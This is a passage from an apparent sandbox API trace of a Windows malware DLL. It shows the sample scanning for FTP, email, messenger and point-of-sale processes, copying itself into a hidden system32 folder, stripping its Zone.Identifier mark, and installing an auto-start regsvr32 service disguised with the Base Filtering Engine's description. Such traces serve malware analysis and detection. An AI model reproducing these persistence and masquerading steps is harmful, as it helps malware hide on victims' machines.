cntUsage=0x0, th32ProcessID=0xea8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0089.011] GetCurrentProcessId () returned 0xb54 [0089.011] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0089.012] GetCurrentProcessId () returned 0xb54 [0089.012] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xec8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0089.013] GetCurrentProcessId () returned 0xb54 [0089.013] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xed0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0089.014] GetCurrentProcessId () returned 0xb54 [0089.014] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xee0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0089.015] GetCurrentProcessId () returned 0xb54 [0089.016] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xee8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0089.017] GetCurrentProcessId () returned 0xb54 [0089.017] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0089.018] GetCurrentProcessId () returned 0xb54 [0089.018] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xefc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0089.019] GetCurrentProcessId () returned 0xb54 [0089.019] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0089.020] GetCurrentProcessId () returned 0xb54 [0089.020] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0089.021] GetCurrentProcessId () returned 0xb54 [0089.021] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0089.022] GetCurrentProcessId () returned 0xb54 [0089.022] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0089.024] GetCurrentProcessId () returned 0xb54 [0089.024] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0089.025] GetCurrentProcessId () returned 0xb54 [0089.025] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0089.026] GetCurrentProcessId () returned 0xb54 [0089.026] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0089.027] GetCurrentProcessId () returned 0xb54 [0089.027] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0089.028] GetCurrentProcessId () returned 0xb54 [0089.028] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0089.030] GetCurrentProcessId () returned 0xb54 [0089.030] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0089.031] GetCurrentProcessId () returned 0xb54 [0089.031] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0089.032] GetCurrentProcessId () returned 0xb54 [0089.032] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0089.033] GetCurrentProcessId () returned 0xb54 [0089.033] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0089.034] GetCurrentProcessId () returned 0xb54 [0089.034] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xfa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0089.035] GetCurrentProcessId () returned 0xb54 [0089.035] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0089.036] GetCurrentProcessId () returned 0xb54 [0089.036] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0089.038] GetCurrentProcessId () returned 0xb54 [0089.038] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0089.039] GetCurrentProcessId () returned 0xb54 [0089.039] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xfd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0089.040] GetCurrentProcessId () returned 0xb54 [0089.040] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0089.041] GetCurrentProcessId () returned 0xb54 [0089.041] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0089.043] GetCurrentProcessId () returned 0xb54 [0089.043] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0089.044] GetCurrentProcessId () returned 0xb54 [0089.044] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x380, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0089.045] GetCurrentProcessId () returned 0xb54 [0089.045] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0089.047] GetCurrentProcessId () returned 0xb54 [0089.047] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0089.048] GetCurrentProcessId () returned 0xb54 [0089.048] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0089.049] GetCurrentProcessId () returned 0xb54 [0089.049] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0089.052] GetCurrentProcessId () returned 0xb54 [0089.052] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0089.054] GetCurrentProcessId () returned 0xb54 [0089.054] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0089.055] GetCurrentProcessId () returned 0xb54 [0089.055] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1050, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="answerelectionthroughout.exe")) returned 1 [0089.056] GetCurrentProcessId () returned 0xb54 [0089.056] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x66c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0089.057] GetCurrentProcessId () returned 0xb54 [0089.057] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x270, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0089.058] GetCurrentProcessId () returned 0xb54 [0089.058] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x12dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x354, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0089.059] GetCurrentProcessId () returned 0xb54 [0089.059] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x12ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x354, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0089.060] GetCurrentProcessId () returned 0xb54 [0089.060] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x13a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x12dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0089.062] GetCurrentProcessId () returned 0xb54 [0089.062] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x13fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x38c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0089.063] GetCurrentProcessId () returned 0xb54 [0089.063] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="LNMfxzVh.exe")) returned 1 [0089.064] GetCurrentProcessId () returned 0xb54 [0089.064] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xb54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xce4, pcPriClassBase=8, dwFlags=0x0, szExeFile="regsvr32.exe")) returned 1 [0089.065] GetCurrentProcessId () returned 0xb54 [0089.065] CloseHandle (hObject=0x1f0) returned 1 [0089.066] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0xce4) returned 0x1f0 [0089.066] QueryFullProcessImageNameW (in: hProcess=0x1f0, dwFlags=0x0, lpExeName=0xce370, lpdwSize=0xce328 | out: lpExeName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\LNMfxzVh.exe", lpdwSize=0xce328) returned 1 [0089.067] CloseHandle (hObject=0x1f0) returned 1 [0089.067] PathFindFileNameW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop\\LNMfxzVh.exe") returned="LNMfxzVh.exe" [0089.067] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xce160 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0089.072] lstrlenW (lpString="C:\\Windows\\system32") returned 19 [0089.072] StrCmpNIW (lpStr1="C:\\Users\\RDHJ0C~1\\D", lpStr2="C:\\Windows\\system32", nChar=19) returned -1 [0089.078] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x5bf5e4 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0089.078] lstrlenW (lpString="C:\\Windows\\system32") returned 19 [0089.081] GetModuleFileNameW (in: hModule=0x1dc0000, lpFilename=0xce380, nSize=0x104 | out: lpFilename="C:\\Users\\RDHJ0C~1\\Desktop\\5Dq6sWcmD.dll.ocx" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\5dq6swcmd.dll.ocx")) returned 0x2b [0089.082] lstrcpyW (in: lpString1=0xcdf20, lpString2="C:\\Users\\RDHJ0C~1\\Desktop\\5Dq6sWcmD.dll.ocx" | out: lpString1="C:\\Users\\RDHJ0C~1\\Desktop\\5Dq6sWcmD.dll.ocx") returned="C:\\Users\\RDHJ0C~1\\Desktop\\5Dq6sWcmD.dll.ocx" [0089.082] lstrcpyW (in: lpString1=0xce130, lpString2="C:\\Windows\\system32\\GnynPsiyLKdYjn\\GQeyw.dll" | out: lpString1="C:\\Windows\\system32\\GnynPsiyLKdYjn\\GQeyw.dll") returned="C:\\Windows\\system32\\GnynPsiyLKdYjn\\GQeyw.dll" [0089.083] SHFileOperationW (in: lpFileOp=0xcdee8*(hwnd=0x0, wFunc=0x1, pFrom="C:\\Users\\RDHJ0C~1\\Desktop\\5Dq6sWcmD.dll.ocx", pTo="C:\\Windows\\system32\\GnynPsiyLKdYjn\\GQeyw.dll", fFlags=0xe14, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x0) | out: lpFileOp=0xcdee8*(hwnd=0x0, wFunc=0x1, pFrom="C:\\Users\\RDHJ0C~1\\Desktop\\5Dq6sWcmD.dll.ocx", pTo="C:\\Windows\\system32\\GnynPsiyLKdYjn\\GQeyw.dll", fFlags=0xe14, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x0)) returned 0 [0091.706] GetProcessHeap () returned 0x5a0000 [0091.706] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x28) returned 0x612440 [0091.707] _snwprintf (in: _Dest=0xce130, _Count=0x104, _Format="%s:Zone.Identifier" | out: _Dest="C:\\Windows\\system32\\GnynPsiyLKdYjn\\GQeyw.dll:Zone.Identifier") returned 60 [0091.707] GetProcessHeap () returned 0x5a0000 [0091.708] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x612440 | out: hHeap=0x5a0000) returned 1 [0091.708] DeleteFileW (lpFileName="C:\\Windows\\system32\\GnynPsiyLKdYjn\\GQeyw.dll:Zone.Identifier" (normalized: "c:\\windows\\system32\\gnynpsiylkdyjn\\gqeyw.dll:zone.identifier")) returned 0 [0091.708] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xce360 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0091.709] GetProcessHeap () returned 0x5a0000 [0091.709] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x30) returned 0x60add0 [0091.710] _snwprintf (in: _Dest=0xce150, _Count=0x104, _Format="%s\\regsvr32.exe \"%s\"" | out: _Dest="C:\\Windows\\system32\\regsvr32.exe \"C:\\Windows\\system32\\GnynPsiyLKdYjn\\GQeyw.dll\"") returned 79 [0091.710] GetProcessHeap () returned 0x5a0000 [0091.711] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x60add0 | out: hHeap=0x5a0000) returned 1 [0091.711] PathFindFileNameW (pszPath="C:\\Windows\\system32\\GnynPsiyLKdYjn\\GQeyw.dll") returned="GQeyw.dll" [0091.711] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x611fc0 [0091.716] CreateServiceW (in: hSCManager=0x611fc0, lpServiceName="GQeyw.dll", lpDisplayName="GQeyw.dll", dwDesiredAccess=0x2, dwServiceType=0x10, dwStartType=0x2, dwErrorControl=0x0, lpBinaryPathName="C:\\Windows\\system32\\regsvr32.exe \"C:\\Windows\\system32\\GnynPsiyLKdYjn\\GQeyw.dll\"", lpLoadOrderGroup=0x0, lpdwTagId=0x0, lpDependencies=0x0, lpServiceStartName=0x0, lpPassword=0x0 | out: lpdwTagId=0x0) returned 0x611e40 [0094.299] GetProcessHeap () returned 0x5a0000 [0094.299] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x20000) returned 0x61bb40 [0094.301] GetProcessHeap () returned 0x5a0000 [0094.301] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x2000) returned 0x63bb50 [0094.302] EnumServicesStatusExW (in: hSCManager=0x611fc0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x3, lpServices=0x61bb40, cbBufSize=0x20000, pcbBytesNeeded=0xcdfe0, lpServicesReturned=0xcdfd0, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x61bb40, pcbBytesNeeded=0xcdfe0, lpServicesReturned=0xcdfd0, lpResumeHandle=0x0) returned 1 [0094.310] GetTickCount () returned 0x15b774b [0094.310] OpenServiceW (hSCManager=0x611fc0, lpServiceName="BFE", dwDesiredAccess=0x1) returned 0x612350 [0094.311] QueryServiceConfig2W (in: hService=0x612350, dwInfoLevel=0x1, lpBuffer=0x63bb50, cbBufSize=0x2000, pcbBytesNeeded=0xcdfd8 | out: lpBuffer=0x63bb50, pcbBytesNeeded=0xcdfd8) returned 1 [0094.315] CloseServiceHandle (hSCObject=0x612350) returned 1 [0094.315] ChangeServiceConfig2W (hService=0x611e40, dwInfoLevel=0x1, lpInfo=0x63bb50*(lpDescription="The Base Filtering Engine (BFE) is a service that manages firewall and Internet Protocol security (IPsec) policies and implements user mode filtering. Stopping or disabling the BFE service will significantly reduce the security of the system. It will also result in unpredictable behavior in IPsec management and firewall applications.")) returned 1 [0094.316] GetProcessHeap () returned 0x5a0000 [0094.316] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x63bb50 | out: hHeap=0x5a0000) returned 1 [0094.316] GetProcessHeap () returned 0x5a0000 [0094.317] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x61bb40 | out: hHeap=0x5a0000) returned 1 [0094.318] CloseServiceHandle (hSCObject=0x611e40) returned 1 [0094.319] CloseServiceHandle (hSCObject=0x611fc0) returned 1 [0094.319] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xce170 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0094.319] GetProcessHeap () returned 0x5a0000 [0094.319] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x30) returned 0x60ab90 [0094.320] _snwprintf (in: _Dest=0xce380, _Count=0x104, _Format="%s\\regsvr32.exe \"%s\"" | out: _Dest="C:\\Windows\\system32\\regsvr32.exe \"C:\\Windows\\system32\\GnynPsiyLKdYjn\\GQeyw.dll\"") returned 79 [0094.320] GetProcessHeap () returned 0x5a0000 [0094.320] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x60ab90 | out: hHeap=0x5a0000) returned 1 [0094.320] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\regsvr32.exe \"C:\\Windows\\system32\\GnynPsiyLKdYjn\\GQeyw.dll\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0xce090*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xce070 | out: lpCommandLine="C:\\Windows\\system32\\regsvr32.exe \"C:\\Windows\\system32\\GnynPsiyLKdYjn\\GQeyw.dll\"", lpProcessInformation=0xce070*(hProcess=0x2d4, hThread=0x21c, dwProcessId=0xde0, dwThreadId=0xb64)) returned 1 [0094.342] CloseHandle (hObject=0x2d4) returned 1 [0094.342] CloseHandle (hObject=0x21c) returned 1 [0094.342] ExitProcess (uExitCode=0x0) [0094.388] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5c44b0 | out: hHeap=0x5a0000) returned 1 [0094.489] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5c5cc0 | out: hHeap=0x5a0000) returned 1 [0094.489] RtlInterlockedFlushSList (in: ListHead=0x1de13c0 | out: ListHead=0x1de13c0) returned 0x0 [0094.489] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5de8d0 | out: hHeap=0x5a0000) returned 1 [0094.490] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5e1fd0 | out: hHeap=0x5a0000) returned 1 [0094.490] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x600ec0 | out: hHeap=0x5a0000) returned 1 [0094.491] GetProcAddress (hModule=0x7ffe94740000, lpProcName="FlsFree") returned 0x7ffe947aca20 [0094.492] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5dab10 | out: hHeap=0x5a0000) returned 1 [0094.492] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5dd330 | out: hHeap=0x5a0000) returned 1 [0094.492] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5e45a0 | out: hHeap=0x5a0000) returned 1 Thread: id = 10 os_tid = 0x87c Thread: id = 11 os_tid = 0xc8c [0089.161] GetLastError () returned 0x57 [0089.161] GetProcAddress (hModule=0x7ffe94740000, lpProcName="FlsGetValue") returned 0x7ffe94783780 [0089.161] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x80) returned 0x5dab10 [0089.161] SetLastError (dwErrCode=0x57) [0089.161] GetLastError () returned 0x57 [0089.162] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x3c8) returned 0x5de8d0 [0089.162] SetLastError (dwErrCode=0x57) Thread: id = 12 os_tid = 0xc90 [0089.191] GetLastError () returned 0x57 [0089.191] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x80) returned 0x5dd330 [0089.191] SetLastError 